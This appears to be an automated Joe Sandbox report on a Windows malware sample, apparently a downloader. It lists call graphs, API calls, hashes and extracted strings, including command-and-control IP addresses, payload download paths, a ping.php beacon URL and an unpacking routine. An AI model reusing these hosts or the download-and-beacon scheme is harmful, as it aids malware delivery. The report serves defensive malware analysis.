__ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 5 API calls 45765->45768 45771 4171b7 5 API calls 2 library calls 45766->45771 45769 4139f1 45768->45769 45769->45745 45769->45746 45770 417836 45770->45765 45771->45770 45772 411c277 45773 411c27a 45772->45773 45776 411c536 45773->45776 45777 411c545 45776->45777 45780 411ccd6 45777->45780 45783 411ccf1 45780->45783 45781 411ccfa CreateToolhelp32Snapshot 45782 411cd16 Module32First 45781->45782 45781->45783 45784 411cd25 45782->45784 45785 411c535 45782->45785 45783->45781 45783->45782 45787 411c995 45784->45787 45788 411c9c0 45787->45788 45789 411c9d1 VirtualAlloc 45788->45789 45790 411ca09 45788->45790 45789->45790 45790->45790 45791 5bb003c 45792 5bb0049 45791->45792 45806 5bb0e0f SetErrorMode SetErrorMode 45792->45806 45797 5bb0265 45798 5bb02ce VirtualProtect 45797->45798 45800 5bb030b 45798->45800 45799 5bb0439 VirtualFree 45804 5bb04be 45799->45804 45805 5bb05f4 LoadLibraryA 45799->45805 45800->45799 45801 5bb04e3 LoadLibraryA 45801->45804 45803 5bb08c7 45804->45801 45804->45805 45805->45803 45807 5bb0223 45806->45807 45808 5bb0d90 45807->45808 45809 5bb0dad 45808->45809 45810 5bb0dbb GetPEB 45809->45810 45811 5bb0238 VirtualAlloc 45809->45811 45810->45811 45811->45797 45812 41aff9 45817 41adc7 45812->45817 45816 41b021 45818 41adf2 45817->45818 45828 41af3b 45818->45828 45832 422ce9 46 API calls 2 library calls 45818->45832 45820 41afe5 45836 410905 26 API calls _Deallocate 45820->45836 45822 41af44 45822->45816 45829 41a34b 45822->45829 45824 41af85 45824->45828 45833 422ce9 46 API calls 2 library calls 45824->45833 45826 41afa4 45826->45828 45834 422ce9 46 API calls 2 library calls 45826->45834 45828->45822 45835 412381 20 API calls __dosmaperr 45828->45835 45837 419d20 45829->45837 45831 41a366 45831->45816 45832->45824 45833->45826 45834->45828 45835->45820 45836->45822 45839 419d2c CallCatchBlock 45837->45839 45838 419d3a 45855 412381 20 API calls __dosmaperr 45838->45855 45839->45838 45841 419d73 45839->45841 45848 41a2fa 45841->45848 45842 419d3f 45856 410905 26 API calls _Deallocate 45842->45856 45847 419d49 std::_Locinfo::_Locinfo_dtor 45847->45831 45858 4228d8 45848->45858 45851 419d97 45857 419dc0 LeaveCriticalSection __wsopen_s 45851->45857 45854 41629a _free 20 API calls 45854->45851 45855->45842 45856->45847 45857->45847 45859 4228e4 45858->45859 45860 4228fb 45858->45860 45929 412381 20 API calls __dosmaperr 45859->45929 45862 422903 45860->45862 45863 42291a 45860->45863 45931 412381 20 API calls __dosmaperr 45862->45931 45933 4172ce 10 API calls 2 library calls 45863->45933 45864 4228e9 45930 410905 26 API calls _Deallocate 45864->45930 45868 422908 45932 410905 26 API calls _Deallocate 45868->45932 45869 422921 MultiByteToWideChar 45870 422950 45869->45870 45871 422940 GetLastError 45869->45871 45874 417a45 std::_Locinfo::_Locinfo_dtor 21 API calls 45870->45874 45934 41234b 20 API calls 2 library calls 45871->45934 45876 422958 45874->45876 45875 41a310 45875->45851 45882 41a36b 45875->45882 45877 42295f MultiByteToWideChar 45876->45877 45881 422980 45876->45881 45878 422974 GetLastError 45877->45878 45877->45881 45935 41234b 20 API calls 2 library calls 45878->45935 45879 41629a _free 20 API calls 45879->45875 45881->45879 45936 41a0ce 45882->45936 45885 41a3b6 45954 41e7d7 45885->45954 45886 41a39d 45968 41236e 20 API calls __dosmaperr 45886->45968 45889 41a3a2 45969 412381 20 API calls __dosmaperr 45889->45969 45890 41a3bb 45891 41a3c4 45890->45891 45892 41a3db 45890->45892 45970 41236e 20 API calls __dosmaperr 45891->45970 45967 41a039 CreateFileW 45892->45967 45896 41a3c9 45971 412381 20 API calls __dosmaperr 45896->45971 45897 41a338 45897->45854 45899 41a491 GetFileType 45900 41a4e3 45899->45900 45901 41a49c GetLastError 45899->45901 45976 41e720 21 API calls 3 library calls 45900->45976 45974 41234b 20 API calls 2 library calls 45901->45974 45902 41a466 GetLastError 45973 41234b 20 API calls 2 library calls 45902->45973 45904 41a414 45904->45899 45904->45902 45972 41a039 CreateFileW 45904->45972 45906 41a4aa CloseHandle 45906->45889 45908 41a4d3 45906->45908 45975 412381 20 API calls __dosmaperr 45908->45975 45910 41a459 45910->45899 45910->45902 45912 41a504 45914 41a550 45912->45914 45977 41a24a 72 API calls 5 library calls 45912->45977 45913 41a4d8 45913->45889 45918 41a57d 45914->45918 45978 419dec 72 API calls 5 library calls 45914->45978 45917 41a576 45917->45918 45919 41a58e 45917->45919 45920 4163fd __wsopen_s 29 API calls 45918->45920 45919->45897 45921 41a60c CloseHandle 45919->45921 45920->45897 45979 41a039 CreateFileW 45921->45979 45923 41a637 45924 41a641 GetLastError 45923->45924 45925 41a66d 45923->45925 45980 41234b 20 API calls 2 library calls 45924->45980 45925->45897 45927 41a64d 45981 41e8e9 21 API calls 3 library calls 45927->45981 45929->45864 45930->45875 45931->45868 45932->45875 45933->45869 45934->45875 45935->45881 45937 41a109 45936->45937 45938 41a0ef 45936->45938 45982 41a05e 45937->45982 45938->45937 45989 412381 20 API calls __dosmaperr 45938->45989 45941 41a0fe 45990 410905 26 API calls _Deallocate 45941->45990 45943 41a141 45944 41a170 45943->45944 45991 412381 20 API calls __dosmaperr 45943->45991 45952 41a1c3 45944->45952 45993 413b67 26 API calls 2 library calls 45944->45993 45947 41a1be 45949 41a23d 45947->45949 45947->45952 45948 41a165 45992 410905 26 API calls _Deallocate 45948->45992 45994 410932 11 API calls _abort 45949->45994 45952->45885 45952->45886 45953 41a249 45955 41e7e3 CallCatchBlock 45954->45955 45997 411a06 EnterCriticalSection 45955->45997 45957 41e831 45998 41e8e0 45957->45998 45959 41e7ea 45959->45957 45960 41e80f 45959->45960 45964 41e87d EnterCriticalSection 45959->45964 46001 41e5b6 21 API calls 2 library calls 45960->46001 45962 41e85a std::_Locinfo::_Locinfo_dtor 45962->45890 45963 41e814 45963->45957 46002 41e6fd EnterCriticalSection 45963->46002 45964->45957 45966 41e88a LeaveCriticalSection 45964->45966 45966->45959 45967->45904 45968->45889 45969->45897 45970->45896 45971->45889 45972->45910 45973->45889 45974->45906 45975->45913 45976->45912 45977->45914 45978->45917 45979->45923 45980->45927 45981->45925 45985 41a076 45982->45985 45983 41a091 45983->45943 45985->45983 45995 412381 20 API calls __dosmaperr 45985->45995 45986 41a0b5 45996 410905 26 API calls _Deallocate 45986->45996 45988 41a0c0 45988->45943 45989->45941 45990->45937 45991->45948 45992->45944 45993->45947 45994->45953 45995->45986 45996->45988 45997->45959 46003 411a4e LeaveCriticalSection 45998->46003 46000 41e8e7 46000->45962 46001->45963 46002->45957 46003->46000 46004 41870f 46005 41871b CallCatchBlock 46004->46005 46006 418727 46005->46006 46007 41873e 46005->46007 46038 412381 20 API calls __dosmaperr 46006->46038 46017 40e81d EnterCriticalSection 46007->46017 46010 41872c 46039 410905 26 API calls _Deallocate 46010->46039 46011 41874e 46018 41878b 46011->46018 46014 41875a 46040 418781 LeaveCriticalSection _Xfiopen 46014->46040 46016 418737 std::_Locinfo::_Locinfo_dtor 46017->46011 46019 4187b3 46018->46019 46020 418799 46018->46020 46022 4154e8 _Xfiopen 26 API calls 46019->46022 46044 412381 20 API calls __dosmaperr 46020->46044 46024 4187bc 46022->46024 46023 41879e 46045 410905 26 API calls _Deallocate 46023->46045 46041 4197e5 46024->46041 46028 4188c0 46030 4188cd 46028->46030 46034 418873 46028->46034 46029 418844 46032 418861 46029->46032 46029->46034 46047 412381 20 API calls __dosmaperr 46030->46047 46046 418aa4 31 API calls 3 library calls 46032->46046 46035 4187a9 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 46034->46035 46048 418920 30 API calls 2 library calls 46034->46048 46035->46014 46036 41886b 46036->46035 46038->46010 46039->46016 46040->46016 46049 419662 46041->46049 46043 4187d8 46043->46028 46043->46029 46043->46035 46044->46023 46045->46035 46046->46036 46047->46035 46048->46035 46050 41966e CallCatchBlock 46049->46050 46051 419676 46050->46051 46054 41968e 46050->46054 46075 41236e 20 API calls __dosmaperr 46051->46075 46053 419742 46080 41236e 20 API calls __dosmaperr 46053->46080 46054->46053 46058 4196c6 46054->46058 46056 41967b 46076 412381 20 API calls __dosmaperr 46056->46076 46057 419747 46081 412381 20 API calls __dosmaperr 46057->46081 46074 41e6fd EnterCriticalSection 46058->46074 46062 41974f 46082 410905 26 API calls _Deallocate 46062->46082 46063 4196cc 46065 4196f0 46063->46065 46066 419705 46063->46066 46077 412381 20 API calls __dosmaperr 46065->46077 46069 419767 _Xfiopen 28 API calls 46066->46069 46068 419683 std::_Locinfo::_Locinfo_dtor 46068->46043 46071 419700 46069->46071 46070 4196f5 46078 41236e 20 API calls __dosmaperr 46070->46078 46079 41973a LeaveCriticalSection __wsopen_s 46071->46079 46074->46063 46075->46056 46076->46068 46077->46070 46078->46071 46079->46068 46080->46057 46081->46062 46082->46068

                                                                                                                                                                                                                                  Executed Functions

                                                                                                                                                                                                                                  Function 00424B3E Relevance: 53.7, APIs: 1, Strings: 29, Instructions: 1213COMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 0 424b3e-424eb5 call 40a0c0 call 403491 call 40197c call 401b1e call 401a8d call 401a72 call 401a8d call 403498 call 401b52 call 401b1e call 426354 call 401b1e GetModuleFileNameA call 401b1e call 425ee2 call 401a0c call 403491 * 3 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c call 403491 * 5 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 403491 * 3 call 40197c 129 424f07-425842 call 403491 * 35 call 40197c call 401b1e call 401a67 * 2 call 4034e3 call 401ae8 call 403491 * 14 call 40197c call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 21 call 40197c call 403491 * 9 call 40197c call 403491 call 40197c call 42612f call 403491 * 15 call 40197c call 403491 * 19 call 40197c call 401b1e call 401a67 call 40356f call 401ae8 call 401b41 * 2 call 401adf call 401a67 call 401adf call 426504 call 40ff7e call 403491 * 14 call 40197c call 403491 * 12 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 0->129 130 424eb7 0->130 499 425e40-425eb7 call 4019f8 * 2 call 401ae8 call 4019f8 call 401ae8 call 401a11 call 401ae8 * 4 129->499 500 425848-425893 call 40b5a0 call 410c91 call 4262d2 call 426217 129->500 132 424ef2-424ef7 130->132 133 424ec1-424ec6 130->133 134 424ed6-424edb 130->134 135 424ee4-424ee9 130->135 136 424eeb-424ef0 130->136 137 424ec8-424ecd 130->137 138 424ef9 130->138 139 424ebe-424ebf 130->139 140 424ecf-424ed4 130->140 141 424edd-424ee2 130->141 142 424efe-424f02 call 401adf 132->142 133->142 134->142 135->142 136->142 137->142 138->142 139->142 140->142 141->142 142->129 517 425895-4258a7 call 401b1e call 426260 500->517 518 4258af-425ac6 call 40ff7e call 403491 * 16 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 500->518 529 4258ac 517->529 613 425bcf-425db7 call 403491 * 15 call 40197c call 403491 * 15 call 40197c call 401b41 * 2 call 401adf * 2 call 426504 518->613 614 425acc-425ba6 call 40b5a0 call 403491 * 12 call 40197c call 42631a call 426217 518->614 529->518 729 425e2b-425e3b call 4019f8 * 2 613->729 730 425db9-425e02 call 40b5a0 call 410c91 call 4262d2 call 426217 613->730 679 425bc2-425bc9 call 40ff7e 614->679 680 425ba8-425bbf call 401b1e call 426260 614->680 687 425bce 679->687 680->679 687->613 729->499 742 425e04-425e16 call 401b1e call 426260 730->742 743 425e1e-425e25 call 40ff7e 730->743 749 425e1b 742->749 747 425e2a 743->747 747->729 749->743
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 00426354: __EH_prolog.LIBCMT ref: 00426359
                                                                                                                                                                                                                                  • GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043CEE4), ref: 00424C05
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: __EH_prolog.LIBCMT ref: 00425EE7
                                                                                                                                                                                                                                    • Part of subcall function 00425EE2: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00425FC9
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: H_prolog$FileIos_base_dtorModuleNamestd::ios_base::_
                                                                                                                                                                                                                                  • String ID: /1/Qg_Appv5.exe$/BroomSetup.exe$/cpa/ping.php?substr=%s&s=ab&sub=%s$/ping.php?substr=%s$/syncUpd.exe$185.172.128.228$185.172.128.228$185.172.128.59$185.172.128.90$Installed$P$P$P$P$P$Qg_Appv5.exe$SOFTWARE\BroomCleaner$eight$five$four$nine$note.padd.cn.com$one$seven$six$sub=([\w-]{1,255})$ten$three$two
                                                                                                                                                                                                                                  • API String ID: 2531350358-4166474000
                                                                                                                                                                                                                                  • Opcode ID: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction ID: b94a07167da01af8c51153bc4f1e8c174558d31be475b6648fa5fcd106bc986c
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: ae36505b5daff832a18cd0001135b0aff67938ad5caa572e98a89e9e35783f3c
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: A3A2211050A2E19AC712FB75589758A2FE51B6630DF54A87FE5D03F2A3C97C820C87AF
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004139E7 Relevance: 4.5, APIs: 3, Instructions: 20COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1697 4139e7-4139f3 call 4177fa 1700 413a15-413a21 call 413a6c ExitProcess 1697->1700 1701 4139f5-413a03 GetPEB 1697->1701 1701->1700 1702 413a05-413a0f GetCurrentProcess TerminateProcess 1701->1702 1702->1700
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • GetCurrentProcess.KERNEL32(00000003,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A08
                                                                                                                                                                                                                                  • TerminateProcess.KERNEL32(00000000,?,004139BD,00000003,00439450,0000000C,00413B14,00000003,00000002,00000000,?,00412B6B,00000003), ref: 00413A0F
                                                                                                                                                                                                                                  • ExitProcess.KERNEL32 ref: 00413A21
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: Process$CurrentExitTerminate
                                                                                                                                                                                                                                  • String ID:
                                                                                                                                                                                                                                  • API String ID: 1703294689-0
                                                                                                                                                                                                                                  • Opcode ID: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction ID: 5487a5d46cc6b628b64d0aabb319d5eb223523a794a7473b7ec3082598feaf8f
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 41e8ad208a3876fc19484f537d8192bb69e165b4f10d4b201afb92c4f14ee63d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: E2E04F31101504ABCF116F14DD08A9A3B29FF04386F454029F84656131CF39DE83CA48
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 00426504 Relevance: 48.4, APIs: 16, Strings: 11, Instructions: 1148networkCOMMON
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 750 426504-427062 call 4275a4 call 403491 * 15 call 40197c call 403491 * 14 call 40197c call 403491 * 17 call 40197c call 403491 * 7 call 40197c call 403491 * 2 call 40197c call 403491 * 2 call 40197c call 403491 * 5 call 40197c call 403491 * 4 call 40197c call 401b1e call 401a67 call 401aa1 call 403491 * 9 call 40197c call 401aa1 * 2 call 403491 * 6 call 40197c call 401aa1 call 401a67 call 401aa1 * 2 call 403491 * 12 call 40197c call 401aa1 call 403491 * 61 call 40197c call 401aa1 call 403491 * 55 call 40197c call 401aa1 * 2 1223 427068-42706b 750->1223 1224 42717c-42719d call 401aa1 WSAStartup 750->1224 1223->1224 1225 427071-427177 call 403491 * 16 call 40197c call 401aa1 call 403ae1 call 401ac2 call 401ae8 call 401aa1 1223->1225 1230 4271a3-4271b9 socket 1224->1230 1231 427571 1224->1231 1225->1224 1232 4271d0-4271e3 call 401a67 gethostbyname 1230->1232 1233 4271bb-4271cb call 40ff7e WSACleanup 1230->1233 1235 427574-42757d call 40ff7e 1231->1235 1232->1235 1245 4271e9-427225 call 40aaa0 htons connect 1232->1245 1244 42758b-4275a3 call 401ae8 1233->1244 1247 42757e-427585 WSACleanup closesocket 1235->1247 1245->1235 1254 42722b-427247 call 403da5 call 401a67 send 1245->1254 1247->1244 1254->1235 1264 42724d-427251 1254->1264 1266 427253-427263 send 1264->1266 1267 427269-42728d call 40b5a0 1264->1267 1266->1235 1266->1267 1274 42728f-4272a3 recv 1267->1274 1274->1235 1276 4272a9-4272ae 1274->1276 1278 4273b6-4273bf 1276->1278 1279 4272b4-4272bc 1276->1279 1278->1235 1280 4273c5-4273c8 1278->1280 1279->1278 1282 4272c2-4272ca 1279->1282 1280->1274 1282->1278 1284 4272d0-4272db 1282->1284 1286 427300-427309 1284->1286 1287 4272dd-4272f2 call 412faf 1284->1287 1290 42730c-427311 1286->1290 1287->1235 1295 4272f8-4272fb 1287->1295 1290->1290 1293 427313-427315 1290->1293 1296 42731b-427330 call 403a0c 1293->1296 1297 4273cd-4273d2 1293->1297 1302 4273ad-4273b3 1295->1302 1296->1302 1310 427332-427352 call 412faf 1296->1310 1299 4273d4-4273d8 1297->1299 1300 4273df-4273e3 1297->1300 1304 4273da 1299->1304 1305 4273e9-427405 call 426127 1299->1305 1300->1305 1306 427515-427517 1300->1306 1302->1278 1304->1235 1321 427408-42740a 1305->1321 1308 42755b-427568 call 426127 1306->1308 1309 427519-427532 call 426127 1306->1309 1327 42756a-42756f 1308->1327 1324 427535-427548 recv 1309->1324 1325 427376-42738e call 412faf 1310->1325 1326 427354-42736e call 41196d 1310->1326 1328 42740d-427421 recv 1321->1328 1324->1235 1330 42754a-427557 1324->1330 1325->1302 1342 427390-4273aa call 412faf 1325->1342 1326->1235 1341 427374 1326->1341 1327->1247 1328->1235 1333 427427-42742c 1328->1333 1330->1324 1335 427559 1330->1335 1338 427432-427437 1333->1338 1339 4274fb-427502 1333->1339 1335->1327 1338->1339 1343 42743d-427442 1338->1343 1339->1328 1344 427508 1339->1344 1341->1302 1342->1302 1343->1339 1347 427448-427469 call 41196d 1343->1347 1344->1235 1347->1235 1353 42746f-427471 1347->1353 1353->1235 1355 427477 1353->1355 1357 42750a-427513 1355->1357 1358 42747d-427489 1355->1358 1357->1327 1360 4274a5-4274a7 1358->1360 1361 42748b-4274a2 call 42611d 1358->1361 1364 4274aa-4274c0 recv 1360->1364 1361->1360 1364->1235 1367 4274c6-4274d3 1364->1367 1367->1364 1368 4274d5-4274e7 recv 1367->1368 1368->1235 1369 4274ed-4274f6 1368->1369 1369->1321
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                  • __EH_prolog.LIBCMT ref: 00426509
                                                                                                                                                                                                                                  • WSAStartup.WS2_32(00000202,?), ref: 00427195
                                                                                                                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 004271AB
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 004271C5
                                                                                                                                                                                                                                  • gethostbyname.WS2_32(00000000), ref: 004271D9
                                                                                                                                                                                                                                  • htons.WS2_32(?), ref: 0042720B
                                                                                                                                                                                                                                  • connect.WS2_32(00000000,?,00000010), ref: 0042721C
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,00000000,00000000), ref: 0042723F
                                                                                                                                                                                                                                  • send.WS2_32(00000000,00000000,?,00000000), ref: 0042725B
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,00000000,00000001,00000000), ref: 0042729B
                                                                                                                                                                                                                                  • recv.WS2_32(?,00000000,00000001,00000000), ref: 00427419
                                                                                                                                                                                                                                  • recv.WS2_32(?,?,00000000,00000000), ref: 004274B8
                                                                                                                                                                                                                                  • recv.WS2_32(?,0000000A,00000002,00000000), ref: 004274DF
                                                                                                                                                                                                                                  • recv.WS2_32(00000000,?,?,00000000), ref: 00427540
                                                                                                                                                                                                                                  • WSACleanup.WS2_32 ref: 0042757E
                                                                                                                                                                                                                                  • closesocket.WS2_32(?), ref: 00427585
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: recv$Cleanupsend$H_prologStartupclosesocketconnectgethostbynamehtonssocket
                                                                                                                                                                                                                                  • String ID: HTTP/1.1$185.172.128.90$Content-Length$GET $HTTP/1.1 200 OK$Host: $Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 $POST $Transfer-Encoding$User-Agent: $chunked
                                                                                                                                                                                                                                  • API String ID: 791229064-3676584321
                                                                                                                                                                                                                                  • Opcode ID: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction ID: 5d172c2dbe9bbe0c33395fe13eab479c6144de839071dc58773496d8017457fc
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 7bc742ea917e032f14d27c255483df2a22af7a2c11a4f1ddb339e58efc080f3d
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: F092661090A2A19ACB02FFB5689649E7FF55A1630DB14747FE5907F3D3CA2C8209C76E
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 0041A36B Relevance: 17.8, APIs: 9, Strings: 1, Instructions: 272COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
                                                                                                                                                                                                                                  control_flow_graph 1370 41a36b-41a39b call 41a0ce 1373 41a3b6-41a3c2 call 41e7d7 1370->1373 1374 41a39d-41a3a8 call 41236e 1370->1374 1379 41a3c4-41a3d9 call 41236e call 412381 1373->1379 1380 41a3db-41a424 call 41a039 1373->1380 1381 41a3aa-41a3b1 call 412381 1374->1381 1379->1381 1389 41a491-41a49a GetFileType 1380->1389 1390 41a426-41a42f 1380->1390 1391 41a68d-41a693 1381->1391 1392 41a4e3-41a4e6 1389->1392 1393 41a49c-41a4cd GetLastError call 41234b CloseHandle 1389->1393 1395 41a431-41a435 1390->1395 1396 41a466-41a48c GetLastError call 41234b 1390->1396 1398 41a4e8-41a4ed 1392->1398 1399 41a4ef-41a4f5 1392->1399 1393->1381 1407 41a4d3-41a4de call 412381 1393->1407 1395->1396 1400 41a437-41a464 call 41a039 1395->1400 1396->1381 1403 41a4f9-41a547 call 41e720 1398->1403 1399->1403 1404 41a4f7 1399->1404 1400->1389 1400->1396 1413 41a557-41a57b call 419dec 1403->1413 1414 41a549-41a555 call 41a24a 1403->1414 1404->1403 1407->1381 1420 41a57d 1413->1420 1421 41a58e-41a5d1 1413->1421 1414->1413 1419 41a57f-41a589 call 4163fd 1414->1419 1419->1391 1420->1419 1423 41a5d3-41a5d7 1421->1423 1424 41a5f2-41a600 1421->1424 1423->1424 1426 41a5d9-41a5ed 1423->1426 1427 41a606-41a60a 1424->1427 1428 41a68b 1424->1428 1426->1424 1427->1428 1429 41a60c-41a63f CloseHandle call 41a039 1427->1429 1428->1391 1432 41a641-41a66d GetLastError call 41234b call 41e8e9 1429->1432 1433 41a673-41a687 1429->1433 1432->1433 1433->1428
                                                                                                                                                                                                                                  APIs
                                                                                                                                                                                                                                    • Part of subcall function 0041A039: CreateFileW.KERNEL32(?,?,?,?,?,?,00000000,?,00000000,00000000,00000000,00000000,00000000), ref: 0041A056
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A47F
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A486
                                                                                                                                                                                                                                  • GetFileType.KERNEL32(00000000), ref: 0041A492
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A49C
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A4A5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(00000000), ref: 0041A4C5
                                                                                                                                                                                                                                  • CloseHandle.KERNEL32(?), ref: 0041A60F
                                                                                                                                                                                                                                  • GetLastError.KERNEL32 ref: 0041A641
                                                                                                                                                                                                                                  • __dosmaperr.LIBCMT ref: 0041A648
                                                                                                                                                                                                                                  Strings
                                                                                                                                                                                                                                  Memory Dump Source
                                                                                                                                                                                                                                  • Source File: 0000000B.00000002.2249148672.0000000000400000.00000040.00000001.01000000.0000000B.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                  • Associated: 0000000B.00000002.2249148672.000000000043E000.00000040.00000001.01000000.0000000B.sdmpDownload File
                                                                                                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                  • Snapshot File: hcaresult_11_2_400000_yPlMO3UKyKRvoEYPhbGYOyT0.jbxd
                                                                                                                                                                                                                                  Similarity
                                                                                                                                                                                                                                  • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                                                                                                                                                                                                  • String ID: H
                                                                                                                                                                                                                                  • API String ID: 4237864984-2852464175
                                                                                                                                                                                                                                  • Opcode ID: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction ID: 1a6929838056931ddf07ca16ed76f5c23edfa2113b557bae9411180e0ac2dad7
                                                                                                                                                                                                                                  • Opcode Fuzzy Hash: 0df5222a233c6114ee027709094600eef7ff1df3394e17eab98b892044d57319
                                                                                                                                                                                                                                  • Instruction Fuzzy Hash: DAA13632A041188FDF19DF68D8517EE7BA1AF06324F14015EEC51EB391DB398DA2CB5A
                                                                                                                                                                                                                                  Uniqueness

                                                                                                                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                                                                                                                  Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300COMMONLIBRARYCODE
                                                                                                                                                                                                                                  Download Yara Rule

                                                                                                                                                                                                                                  Control-flow Graph

                                                                                                                                                                                                                                  • Executed
                                                                                                                                                                                                                                  • Not Executed
